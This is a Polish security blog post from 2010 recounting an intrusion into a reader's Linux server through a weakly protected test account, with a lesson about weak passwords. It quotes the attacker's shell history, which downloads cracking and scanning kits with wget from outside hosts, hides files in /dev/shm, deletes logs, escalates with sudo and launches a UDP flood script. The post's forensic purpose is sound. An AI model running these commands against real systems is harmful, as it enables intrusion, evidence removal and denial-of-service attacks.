02 listopada 2010
Historia pewnego włamania, oczywiście z morałem
wtorek, listopada 02, 2010 | Autor:
\m/ojtek
Czytelnicy HARD CORE SECURITY LAB na pewno tak skutecznie zabezpieczają swe serwery, stacje robocze, a nawet podręczne elektroniczne gadżety, że z pewnością nie mogą zbyt często oglądać prawdziwego włamywacza w trakcie skutecznego penetrowania jakiegoś systemu. Dla wszystkich zainteresowanych dokładnym przebiegiem przykładowego włamania na serwer Linuksowy, mam więc małą niespodziankę. Oto historia pewnego autentycznego włamania.
Pewien czytelnik podesłał mi bardzo interesujący log dokumentujący skuteczne włamanie na jeden z jego własnych serwerów. Zobaczmy więc, jak doszło do całego zdarzenia oraz co też włamywacz kombinował już po uzyskaniu dostępu do systemu...
Wszystko zaczęło się od tego, że nieroztropny administrator założył sobie konto testowe o nazwie test, zabezpieczone hasłem... z resztą sami zgadnijcie jakim. Za pomocą tych prostych poświadczeń, do systemu na prawach zwykłego użytkownika dostał się włamywacz i natychmiast zaczął się bawić w najlepsze. Wszystko wyglądało dokładnie tak:
lsecho pwdecho $PWDmkdir wwwcd www/vim index.htmlwuname -ahostname -fpasswdcat /proc/cpuinfo cd /dev/shmls -acD "" mkdir " "cd " "ls -acd /home/testmkdir " "cd " "wget www.cipyback.home.ro/xxx.tartar xvf nou.tarrm -rf nou.tarcd probe/./crack xxx.65wcd ..rm -rf probe/cd ..rm -rf test/wcd /homels -alast -20cat /proc/cpuinfo uname -awcd /homels -acd ..ls -arm -rf sipscan7.1/wps axkill -9 17604wcd /homels -alast -20hostname -fwls -awcd /dev/shmls -amkdir " "cd " "cd /home/testwget teamhacking.netfirms.com/xxx.tgztar zxvf sip.tgzrm -rf sip.tgzcd sipscan7.1/nano email screenwcd /dev/shmcdcD " "cd /dev/shmcd " "mkdir " "cd " "cd /home/testls -acd " "ls -awget www.cipyback.home.ro/xxx.tartar xvf nou.tarrm -rf nou.tarcd probe/./crack xx.16cd " "ls -acd ..ls -arm -rf .access.log/cd " "ls -acd probe/ls -acat vuln.txt ./crack xx.52cd /home/testwget corleone.athost.biz/xxx.tgztar zxvf sip.tgzrm -rf sip.tgzcd aloha/ls -anano mail_to.testnano mail_to.txtscreen./svmap.py xxx.0.0.0-xxx.255.255.255Po uzyskaniu uprawnień administracyjnych, zabawa trwała w najlepsze:
sudo -suname -aexitexitwps -xcd /var/tmpls -acd " "ls -acd ..wget pibo.com/.x/flood/xxx.tartar zxvf udp.tarrm -rf udp.tarchmod +x *perl udp.pl xxx.102.52.202 0 0
Ciekaw jestem, jak oceniacie umiejętności oraz narzędzia wykorzystane przez tego włamywacza? Jedno jest natomiast pewne. Tworzenie testowych kont zabezpieczonych bardzo słabymi hasłami nigdy nie jest dobrym pomysłem i jest to jedna z najczęstszych furtek otwierających włamywaczom drogę do wielu serwerów oraz usług pracujących w Internecie.
Historia pewnego włamania, oczywiście z morałem
2010-11-02T21:37:00+01:00
\m/ojtek
Bezpieczeństwo systemów operacyjnych|Informatyka śledcza|Obrona - Atak|Wywiad informatyczny|
Subskrybuj:
Komentarze do posta (Atom)
Wyszukaj w HCSL:
Subskrybuj:
Najpopularniejsze artykuły wszech czasów:
- Urządzenia do kopiowania kart płatniczych
- Co tak naprawdę ujawniasz w Internecie?
- Dlaczego należy zasłaniać klawiaturę bankomatu?
- Publiczna wiadomość z ukrytym przekazem
- Przyszłość antywirusów jest jasna
- Sposób na obejście internetowych blokad
- Superbezpieczne hasła na... żółtej karteczce
- Funkcje sprzętowego kasowania danych w HDD!
- 12-latek odkrył krytyczną lukę w Firefoksie
- Przestępstwo nie popłaca
- Czy jesteśmy inwigilowani przez chiński sprzęt?
- Gotowy zestaw do podsłuchiwania GSM
- Jak działa internetowa mafia?
- Uwaga na nowy rodzaj ataków phishingowych!
- Microsoftowy poradnik dla organów ścigania!
- Polski super-bezpieczny system Qubes OS
- Dane wieczyście dostępne
- Pierwszy atak samochodowych crackerów
- Pliki PDF zdolne do wykonania dowolnego kodu
- Polskie służby współpracują z firmą Google?
- Więzienie za odmowę ujawnienia hasła
- Podrzucanie dziecięcej pornografii
- Zapomniany film o hakerach
- Łamanie haseł w Windows Vista i 7